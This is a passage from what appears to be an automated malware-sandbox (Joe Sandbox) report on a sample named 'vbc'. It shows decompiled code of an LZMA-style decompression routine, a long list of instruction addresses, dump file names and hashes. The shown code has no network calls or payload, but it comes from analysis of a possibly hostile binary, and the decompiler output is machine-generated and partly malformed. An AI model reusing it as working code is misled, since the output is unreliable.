								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							L56:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1a;
								goto L170;
							}
							__ecx =  *(__ebp - 0x68);
							__al =  *(__ebp - 0x5c);
							__edx =  *(__ebp - 8);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
							 *( *(__ebp - 0x68)) = __al;
							__ecx =  *(__ebp - 0x14);
							 *(__ecx +  *(__ebp - 8)) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t192 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t192;
							goto L79;
						case 0x1b:
							goto L75;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = _t414;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}

0x00000000
0x00406c26
0x00406c26
0x00406c2a
0x00406ce1
0x00406ce4
0x00406cf0
0x00406bd1
0x00406bd1
0x00406bd4
0x00406f46
0x00406f46
0x00406f49
0x00406f49
0x00406f4f
0x00406f55
0x00406f5b
0x00406f75
0x00406f78
0x00406f7e
0x00406f89
0x00406f8b
0x00406f5d
0x00406f5d
0x00406f6c
0x00406f70
0x00406f70
0x00406f95
0x00406fbc
0x00406fbc
0x00406fc2
0x00406fc2
0x00000000
0x00406f97
0x00406f97
0x00406f9b
0x0040714a
0x00000000
0x0040714a
0x00406fa7
0x00406fae
0x00406fb6
0x00406fb9
0x00000000
0x00406fb9
0x00406c30
0x00406c34
0x00407175
0x00407175
0x00407178
0x0040717c
0x0040717c
0x00406c3a
0x00406c40
0x00406c43
0x00406c47
0x00406c4a
0x00406c4e
0x00407114
0x00407160
0x00407168
0x0040716f
0x00407171
0x00000000
0x00407171
0x00406c54
0x00406c57
0x00406c5d
0x00406c5f
0x00406c5f
0x00406c62
0x00406c65
0x00406c68
0x00406c6b
0x00406c6e
0x00406c71
0x00406c72
0x00406c74
0x00406c74
0x00406c74
0x00406c77
0x00406c7a
0x00406c7d
0x00406c80
0x00406c80
0x00406c83
0x00406c85
0x00406c85
0x00406c88
0x00406c88
0x00406c88
0x0040675e
0x0040675e
0x00406767
0x00000000
0x00000000
0x0040676d
0x00000000
0x00406778
0x00000000
0x00000000
0x00406781
0x00406784
0x00406787
0x0040678b
0x00000000
0x00000000
0x00406791
0x00406794
0x00406796
0x00406797
0x0040679a
0x0040679c
0x0040679d
0x0040679f
0x004067a2
0x004067a7
0x004067ac
0x004067b5
0x004067c8
0x004067cb
0x004067d7
0x004067ff
0x00406801
0x0040680f
0x0040680f
0x00406813
0x00000000
0x00000000
0x00000000
0x00000000
0x00406803
0x00406803
0x00406806
0x00406807
0x00406807
0x00000000
0x00406803
0x004067dd
0x004067e2
0x004067e2
0x004067eb
0x004067f3
0x004067f6
0x00000000
0x004067fc
0x004067fc
0x00000000
0x004067fc
0x00000000
0x00406819
0x00406819
0x0040681d
0x004070c9
0x00000000
0x004070c9
0x00406826
0x00406836
0x00406839
0x0040683c
0x0040683c
0x0040683c
0x0040683f
0x00406843
0x00000000
0x00000000
0x00406845
0x0040684b
0x00406875
0x0040687b
0x00406882
0x00000000
0x00406882
0x00406851
0x00406854
0x00406859
0x00406859
0x00406864
0x0040686c
0x0040686f
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004068b4
0x004068ba
0x004068bd
0x004068ca
0x004068d2
0x00000000
0x00000000
0x00406889
0x00406889
0x0040688d
0x004070d8
0x00000000
0x004070d8
0x00406899
0x004068a4
0x004068a4
0x004068a4
0x004068a7
0x004068aa
0x004068ad
0x004068b2
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004068da
0x004068dc
0x004068df
0x00406950
0x00406953
0x00406956
0x0040695d
0x00406967
0x00000000
0x00406967
0x004068e1
0x004068e5
0x004068e8
0x004068ea
0x004068ed
0x004068f0
0x004068f2
0x004068f5
0x004068f7
0x004068fc
0x004068ff
0x00406902
0x00406906
0x0040690d
0x00406910
0x00406917
0x0040691b
0x00406923
0x00406923
0x00406923
0x0040691d
0x0040691d
0x0040691d
0x00406912
0x00406912
0x00406912
0x00406927
0x0040692a
0x00406948
0x0040694a
0x00000000
0x0040692c
0x0040692c
0x0040692f
0x00406932
0x00406935
0x00406937
0x00406937
0x00406937
0x0040693a
0x0040693d
0x0040693f
0x00406940
0x00406943
0x00000000
0x00406943
0x00000000
0x00406b79
0x00406b7d
0x00406b9b
0x00406b9e
0x00406ba5
0x00406ba8
0x00406bab
0x00406bae
0x00406bb1
0x00406bb4
0x00406bb6
0x00406bbd
0x00406bbe
0x00406bc0
0x00406bc3
0x00406bc6
0x00406bc9
0x00406bc9
0x00406bce
0x00000000
0x00406bce
0x00406b7f
0x00406b82
0x00406b85
0x00406b8f
0x00000000
0x00000000
0x00406be3
0x00406be7
0x00406c0a
0x00406c0d
0x00406c10
0x00406c1a
0x00406be9
0x00406be9
0x00406bec
0x00406bef
0x00406bf2
0x00406bff
0x00406c02
0x00406c02
0x00000000
0x00000000
0x00000000
0x00000000
0x00406c97
0x00406c9b
0x00406ca2
0x00406ca5
0x00406ca8
0x00406cb2
0x00000000
0x00406cb2
0x00406c9d
0x00000000
0x00000000
0x00406cbe
0x00406cc2
0x00406cc9
0x00406ccc
0x00406ccf
0x00406cc4
0x00406cc4
0x00406cc4
0x00406cd2
0x00406cd5
0x00406cd8
0x00406cd8
0x00406cdb
0x00406cde
0x00000000
0x00000000
0x00406d7e
0x00406d7e
0x00406d82
0x00407120
0x00000000
0x00407120
0x00406d88
0x00406d8b
0x00406d8e
0x00406d92
0x00406d95
0x00406d9b
0x00406d9d
0x00406d9d
0x00406d9d
0x00406da0
0x00406da3
0x00000000
0x00000000
0x00406973
0x00406973
0x00406977
0x004070e4
0x00000000
0x004070e4
0x0040697d
0x00406980
0x00406983
0x00406987
0x0040698a
0x00406990
0x00406992
0x00406992
0x00406992
0x00406995
0x00406998
0x00406998
0x0040699b
0x0040699e
0x00000000
0x00000000
0x004069a4
0x004069aa
0x00000000
0x00000000
0x004069b0
0x004069b0
0x004069b4
0x004069b7
0x004069ba
0x004069bd
0x004069c0
0x004069c1
0x004069c4
0x004069c6
0x004069cc
0x004069cf
0x004069d2
0x004069d5
0x004069d8
0x004069db
0x004069de
0x004069fa
0x004069fd
0x00406a00
0x00406a03
0x00406a0a
0x00406a0e
0x00406a10
0x00406a14
0x004069e0
0x004069e0
0x004069e4
0x004069ec
0x004069f1
0x004069f3
0x004069f5
0x004069f5
0x00406a17
0x00406a1e
0x00406a21
0x00000000
0x00406a27
0x00000000
0x00406a27
0x00000000
0x00406a2c
0x00406a2c
0x00406a30
0x004070f0
0x00000000
0x004070f0
0x00406a36
0x00406a39
0x00406a3c
0x00406a40
0x00406a43
0x00406a49
0x00406a4b
0x00406a4b
0x00406a4b
0x00406a4e
0x00406a51
0x00406a51
0x00406a51
0x00406a57
0x00000000
0x00000000
0x00406a59
0x00406a5c
0x00406a5f
0x00406a62
0x00406a65
0x00406a68
0x00406a6b
0x00406a6e
0x00406a71
0x00406a74
0x00406a77
0x00406a8f
0x00406a92
0x00406a95
0x00406a98
0x00406a98
0x00406a9b
0x00406a9f
0x00406aa1
0x00406a79
0x00406a79
0x00406a81
0x00406a86
0x00406a88
0x00406a8a
0x00406a8a
0x00406aa4
0x00406aab
0x00406aae
0x00000000
0x00406ab0
0x00000000
0x00406ab0
0x00406aae
0x00406ab5
0x00406ab5
0x00406ab5
0x00406ab5
0x00000000
0x00000000
0x00406af0
0x00406af0
0x00406af4
0x004070fc
0x00000000
0x004070fc
0x00406afa
0x00406afd
0x00406b00
0x00406b04
0x00406b07
0x00406b0d
0x00406b0f
0x00406b0f
0x00406b0f
0x00406b12
0x00406b15
0x00406b15
0x00406b1b
0x00406ab9
0x00406ab9
0x00406abc
0x00000000
0x00406abc
0x00406b1d
0x00406b1d
0x00406b20
0x00406b23
0x00406b26
0x00406b29
0x00406b2c
0x00406b2f
0x00406b32
0x00406b35
0x00406b38
0x00406b3b
0x00406b53
0x00406b56
0x00406b59
0x00406b5c
0x00406b5c
0x00406b5f
0x00406b63
0x00406b65
0x00406b3d
0x00406b3d
0x00406b45
0x00406b4a
0x00406b4c
0x00406b4e
0x00406b4e
0x00406b68
0x00406b6f
0x00406b72
0x00000000
0x00406b74
0x00000000
0x00406b74
0x00000000
0x00406e01
0x00406e01
0x00406e05
0x0040712c
0x00000000
0x0040712c
0x00406e0b
0x00406e0e
0x00406e11
0x00406e15
0x00406e18
0x00406e1e
0x00406e20
0x00406e20
0x00406e20
0x00406e23
0x00000000
0x00000000
0x00000000
0x00000000
0x00406f10
0x00406f14
0x00406f36
0x00406f39
0x00406f43
0x00000000
0x00406f43
0x00406f16
0x00406f19
0x00406f1d
0x00406f20
0x00406f20
0x00406f23
0x00000000
0x00000000
0x00406fcd
0x00406fd1
0x00406fef
0x00406fef
0x00406fef
0x00406ff6
0x00406ffd
0x00407004
0x00407004
0x00000000
0x00407004
0x00406fd3
0x00406fd6
0x00406fd9
0x00406fdc
0x00406fe3
0x00406f27
0x00406f27
0x00406f2a
0x00000000
0x00000000
0x004070be
0x004070c1
0x00000000
0x00000000
0x00406cf8
0x00406cfa
0x00406d01
0x00406d02
0x00406d04
0x00406d07
0x00000000
0x00000000
0x00406d0f
0x00406d12
0x00406d15
0x00406d17
0x00406d19
0x00406d19
0x00406d1a
0x00406d1d
0x00406d24
0x00406d27
0x00406d35
0x00000000
0x00000000
0x0040700b
0x0040700b
0x0040700e
0x00407015
0x00000000
0x00000000
0x0040701a
0x0040701a
0x0040701e
0x00407156
0x00000000
0x00407156
0x00407024
0x00407027
0x0040702a
0x0040702e
0x00407031
0x00407037
0x00407039
0x00407039
0x00407039
0x0040703c
0x0040703f
0x0040703f
0x0040703f
0x0040703f
0x00407042
0x00407042
0x00407046
0x004070a6
0x004070a9
0x004070ae
0x004070af
0x004070b1
0x004070b3
0x004070b6
0x00000000
0x004070b6
0x00407048
0x0040704e
0x00407051
0x00407054
0x00407057
0x0040705a
0x0040705d
0x00407060
0x00407063
0x00407066
0x00407069
0x00407082
0x00407085
0x00407088
0x0040708b
0x0040708f
0x00407091
0x00407091
0x00407092
0x00407095
0x0040706b
0x0040706b
0x00407073
0x00407078
0x0040707a
0x0040707d
0x0040707d
0x00407098
0x0040709f
0x00000000
0x004070a1
0x00000000
0x004070a1
0x00000000
0x00406d3d
0x00406d40
0x00406d76
0x00406ea6
0x00406ea6
0x00406ea6
0x00406ea6
0x00406ea9
0x00406ea9
0x00406eac
0x00406eae
0x00407138
0x00000000
0x00407138
0x00406eb4
0x00406eb7
0x00000000
0x00000000
0x00406ebd
0x00406ec1
0x00406ec4
0x00406ec4
0x00406ec4
0x00000000
0x00406ec4
0x00406d42
0x00406d44
0x00406d46
0x00406d48
0x00406d4b
0x00406d4c
0x00406d4e
0x00406d50
0x00406d53
0x00406d56
0x00406d6c
0x00406d71
0x00406da9
0x00406da9
0x00406dad
0x00406dd9
0x00406ddb
0x00406de2
0x00406de5
0x00406de8
0x00406de8
0x00406ded
0x00406ded
0x00406def
0x00406df2
0x00406df9
0x00406dfc
0x00406e29
0x00406e29
0x00406e2c
0x00406e2f
0x00406ea3
0x00406ea3
0x00406ea3
0x00000000
0x00406ea3
0x00406e31
0x00406e37
0x00406e3a
0x00406e3d
0x00406e40
0x00406e43
0x00406e46
0x00406e49
0x00406e4c
0x00406e4f
0x00406e52
0x00406e6b
0x00406e6d
0x00406e70
0x00406e71
0x00406e74
0x00406e76
0x00406e79
0x00406e7b
0x00406e7d
0x00406e80
0x00406e82
0x00406e85
0x00406e89
0x00406e8b
0x00406e8b
0x00406e8c
0x00406e8f
0x00406e92
0x00406e54
0x00406e54
0x00406e5c
0x00406e61
0x00406e63
0x00406e66
0x00406e66
0x00406e95
0x00406e9c
0x00406e26
0x00406e26
0x00406e26
0x00406e26
0x00000000
0x00406e9e
0x00000000
0x00406e9e
0x00406e9c
0x00406daf
0x00406db2
0x00406db4
0x00406db7
0x00406dba
0x00406dbd
0x00406dbf
0x00406dc2
0x00406dc5
0x00406dc5
0x00406dc8
0x00406dc8
0x00406dcb
0x00406dd2
0x00406da6
0x00406da6
0x00406da6
0x00406da6
0x00000000
0x00406dd4
0x00000000
0x00406dd4
0x00406dd2
0x00406d58
0x00406d5b
0x00406d5d
0x00406d60
0x00000000
0x00000000
0x00406abf
0x00406abf
0x00406ac3
0x00407108
0x00000000
0x00407108
0x00406ac9
0x00406acc
0x00406acf
0x00406ad2
0x00406ad5
0x00406ad8
0x00406adb
0x00406add
0x00406ae0
0x00406ae3
0x00406ae6
0x00406ae8
0x00406ae8
0x00406ae8
0x00000000
0x00000000
0x00000000
0x00000000
0x00406ec7
0x00406ec7
0x00406ec7
0x00406ecb
0x00000000
0x00000000
0x00406ed1
0x00406ed4
0x00406ed7
0x00406eda
0x00406edc
0x00406edc
0x00406edc
0x00406edf
0x00406ee2
0x00406ee5
0x00406ee8
0x00406eeb
0x00406eee
0x00406eef
0x00406ef1
0x00406ef1
0x00406ef1
0x00406ef4
0x00406ef7
0x00406efa
0x00406efd
0x00406f00
0x00406f04
0x00406f06
0x00406f09
0x00000000
0x00406f0b
0x00000000
0x00406f0b
0x00406f09
0x0040713e
0x00000000
0x00000000
0x0040676d

Memory Dump Source

Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0898a8e2da4e1da6e9a921ed15670c8ccd525f320a25fb1a5aeeb31869c426e5
Instruction ID: 7ea7bfe366fdde138a2213b1adeace564b33d0438ed0be708c4ee64e1a3b53a1
Opcode Fuzzy Hash: 0898a8e2da4e1da6e9a921ed15670c8ccd525f320a25fb1a5aeeb31869c426e5
Instruction Fuzzy Hash: 50814531D04228DFDF24CFA8C884BADBBB1FB44305F25816AD856BB291C7789996CF45

Uniqueness

Uniqueness Score: -1.00%

Function 0040672B Relevance: 5.2, APIs: 4, Instructions: 198
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E0040672B(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M0040717D))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12);
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
